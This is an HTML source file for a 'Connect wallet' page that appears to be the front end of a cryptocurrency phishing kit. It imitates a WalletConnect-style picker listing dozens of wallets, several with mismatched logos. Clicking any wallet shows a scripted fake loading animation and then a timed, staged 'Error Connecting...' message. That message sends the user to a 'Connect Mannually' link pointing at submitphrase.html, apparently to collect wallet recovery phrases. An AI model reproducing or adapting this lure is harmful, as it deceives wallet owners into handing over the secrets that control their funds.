<!DOCTYPE html>
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connect wallet</title>
    <link rel="shortcut icon" type="image/x-icon" href="img/busdx-logo.png">

    <link rel="stylesheet" href="stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    <link rel="stylesheet" href="css/wallet.css">
    <link rel="stylesheet" href="css/appstart.css">
    <!--------------------------------Custome style link------------------>

</head>

<body>
    <main class="main-header">
        <img src="img/def%20logo.png" alt="wallet" class="img-wallet">
        <p class="auth">CONNECT</p>

        <hr
            style="border: 2px solid antiquewhite; width: 50%; margin-left: auto; margin-right: auto; margin-bottom: 40px;">

        <div class="wallets">
            <p class="">Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile
                apps and mobile browsers are supported via mobile deep linking.</p>
        </div>
    </main>


    <aside>
        <div id="myBtn">
            <div class="shadow">
                <a>
                    <img src="img/metamask.jpg" class="img-wallet">
                    <p class="text-center">MetaMask</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/avalaunch.png" class="img-wallet">
                    <p class="text-center">Wemix Wallet</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/mew.png" class="img-wallet">
                    <p class="text-center">Phantom Wallet</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/trust.jpg" class="img-wallet">
                    <p class="text-center">Trust Wallet</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/logo.svg" class="" style="margin-top: 30px;">
                    <p class="text-center">wallet Connect</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/coinbase.jpg" class="img-wallet">
                    <p class="text-center">Una Wallet</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/atomic.jpg" class="img-wallet">
                    <p class="text-center">Atomic Wallet</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/binance.jpg" class="img-wallet">
                    <p class="text-center">Play wallet</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/bnb.jpg" class="img-wallet">
                    <p class="text-center">BNB</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/polkadot.jpg" class="img-wallet">
                    <p class="text-center">Polkadot</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/xrp.jpg" class="img-wallet">
                    <p class="text-center">XRP</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/stellar.jpg" class="img-wallet">
                    <p class="text-center">Stellar</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/tezos.jpg" class="img-wallet">
                    <p class="text-center">Tezos</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/theta.jpg" class="img-wallet">
                    <p class="text-center">Theta</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/tron.jpg" class="img-wallet">
                    <p class="text-center">Tron</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/cosmos.jpg" class="img-wallet">
                    <p class="text-center">Comos</p>
                </a>
            </div>

            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/kava.jpg">
                    <p class="text-center">Kava</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/filecoin.jpg" class="img-wallet">
                    <p class="text-center">Filecoin</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/solana.jpg" class="img-wallet">
                    <p class="text-center">Solana</p>
                </a>
            </div>

            <!------------------------add-------->
            <!------IMG row-

   <div class="shadow">
    <a>
        <img src="img/bullred black.jpeg">
        <p class="text-center">PIGS</p>
    </a>
</div>
------->

            <div class="shadow">
                <a>
                    <img src="img/bullred.jpg" class="img-wallet">
                    <p class="text-center">DOGS</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/spiral.jpg" class="img-wallet">
                    <p class="text-center">DRIP/BUSD</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/ethereum%20classic.jpg" class="img-wallet">
                    <p class="text-center">Ethereum Classic</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/zilliqa.png" class="img-wallet">
                    <p class="text-center">Zilliqa</p>
                </a>
            </div>

            <!------IMG row-------->
            <div class="shadow">
                <a>
                    <img src="img/elrond.jpg" class="img-wallet">
                    <p class="text-center">Elrond</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/waves.png" class="img-wallet">
                    <p class="text-center">Waves</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/icon.jpg" class="img-wallet">
                    <p class="text-center">ICON</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/ontology.jpg" class="img-wallet">
                    <p class="text-center">Ontology</p>
                </a>
            </div>

            <!------button---
<center>
    <button type="button" class="show-btn" onclick="showmore()">Show More <i class="fa fa-arrow-down"></i></button>
</center>
<br>
<div id="showDiv">----->

            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/nano.jpg" class="img-wallet">
                    <p class="text-center">Nano</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/tomo.jpg" class="img-wallet">
                    <p class="text-center">Tomo Chain</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/iotex.png" class="img-wallet">
                    <p class="text-center">Iotex</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/wanchain.jpg" class="img-wallet">
                    <p class="text-center">Wanchain</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/harmony.png" class="img-wallet">
                    <p class="text-center">Harmony</p>
                </a>
            </div>
            <!-----------row ----->
            <div class="shadow">
                <a>
                    <img src="img/kin.jpg" class="img-wallet">
                    <p class="text-center">Kin</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/nimiq.jpg" class="img-wallet">
                    <p class="text-center">Nimiq</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/aion.jpg" class="img-wallet">
                    <p class="text-center">Aion</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/thundertoken.jpg" class="img-wallet">
                    <p class="text-center">Thunder Token</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/aeterity.jpg" class="img-wallet">
                    <p class="text-center">Aeterity</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/nebulas.jpg" class="img-wallet">
                    <p class="text-center">Nebulas</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/fio.jpg" class="img-wallet">
                    <p class="text-center">FIO</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/gochain.jpg" class="img-wallet">
                    <p class="text-center">GoChain</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/poa.jpg" class="img-wallet">
                    <p class="text-center">POA Network</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/callisto.jpg" class="img-wallet">
                    <p class="text-center">Callisto</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/bitpay.jpg" class="img-wallet">
                    <p class="text-center">BitPay</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/aktionariat.jpg" class="img-wallet">
                    <p class="text-center">Aktionariat</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/atwallet.jpg" class="img-wallet">
                    <p class="text-center">AtWallet</p>
                </a>
            </div>

            <!------IMG row-------->
            <div class="shadow">
                <a>
                    <img src="img/guard.jpg" class="img-wallet">
                    <p class="text-center">Guard Wallet</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/atwallet.jpg" class="img-wallet">
                    <p class="text-center">AAVE</p>
                </a>
            </div>

            <!------IMG row-------->
            <div class="shadow">
                <a>
                    <img src="img/exodus.jpg" class="img-wallet">
                    <p class="text-center">Exodus</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/enjin.jpg" class="img-wallet">
                    <p class="text-center">Enjin</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/skale.png" class="img-wallet">
                    <p class="text-center">Skale</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/portis.jpg" class="img-wallet">
                    <p class="text-center">Portis</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/tezos.jpg" class="img-wallet">
                    <p class="text-center">Tezor</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/squarelink.jpg" class="img-wallet">
                    <p class="text-center">Squarelink</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/torus.jpg" class="img-wallet">
                    <p class="text-center">Torus</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/vechain.jpg" class="img-wallet">
                    <p class="text-center">VeChain</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/scatter.jpg" class="img-wallet">
                    <p class="text-center">Scatter Wallet</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/math-wallet.jpg" class="img-wallet">
                    <p class="text-center">Math Wallet</p>
                </a>
            </div>
            <!------IMG row-------->

            <div class="shadow">
                <a>
                    <img src="img/fortmatic.jpg" class="img-wallet">
                    <p class="text-center">ForMatic</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/digitex.jpg" class="img-wallet">
                    <p class="text-center">Digitex</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/ledger.png" class="img-wallet">
                    <p class="text-center">Ledger</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/defiat.png" class="img-wallet">
                    <p class="text-center">Defiat</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/authereum.png" class="img-wallet">
                    <p class="text-center">Authereum</p>
                </a>
            </div>

            <!------IMG row-------->
            <div class="shadow">
                <a>
                    <img src="img/flare.jpg" class="img-wallet">
                    <p class="text-center">Flare Wallet</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/zelcore.jpg" class="img-wallet">
                    <p class="text-center">Zelcore</p>
                </a>
            </div>

            <div class="shadow">
                <a>
                    <img src="img/bitpay.jpg" class="img-wallet">
                    <p class="text-center">BitKeep</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/coin98.jpg" class="img-wallet">
                    <p class="text-center">Coin98</p>
                </a>
            </div>
            <div class="shadow">
                <a>
                    <img src="img/trustvault.jpg" class="img-wallet">
                    <p class="text-center">Trust Vault</p>
                </a>
            </div>

        </div>
        </div>
        </div>
        </div>
    </aside>
    </main>


    <!-- The Modal -->
    <div id="myModal" class="modal">
        <!-- Modal content -->
        <div class="modal-content">
            <span class="close">&times;</span>
            <p class="text text-center"></p>
            <div class="border">
                <div class='container' id="hide">
                    <div class='loader'>
                        <div class='loader--dot'></div>
                        <div class='loader--dot'></div>
                        <div class='loader--dot'></div>
                        <div class='loader--dot'></div>
                        <div class='loader--dot'></div>
                        <div class='loader--dot'></div>
                        <div class='loader--text'></div>
                    </div>
                </div>
                <p class="error" id="error">Error Connecting...
                    <a href="submitphrase.html"><button class="connect-manually">Connect Mannually</button></a>
                </p>
            </div>

            <span class="">
                <span class="p-3">Easy-to-use browser extension </span>
        </div>
    </div>



    <script src="code.jquery.com/jquery-3.4.1.slim.min.js"></script>
    <script src="stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script>
    <script src="ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

    <!--------------------------------JS style link------------------>

    <script src="js/jquery.html"></script>
    <script>
        $(document).ready(function () {
            $('#hide').show(6000).fadeOut(7000);
        });

        $(document).ready(function () {
            $('#error').delay(9000).fadeIn(9000);
        });



        var modal = document.getElementById("myModal");

        var btn = document.getElementById("myBtn");

        var span = document.getElementsByClassName("close")[0];

        btn.onclick = function () {
            modal.style.display = "block";
        }







        span.onclick = function () {
            modal.style.display = "none";
        }

        window.onclick = function (event) {
            if (event.target == modal) {
                modal.style.display = "none";
            }
        }


    </script>

</body>

</html>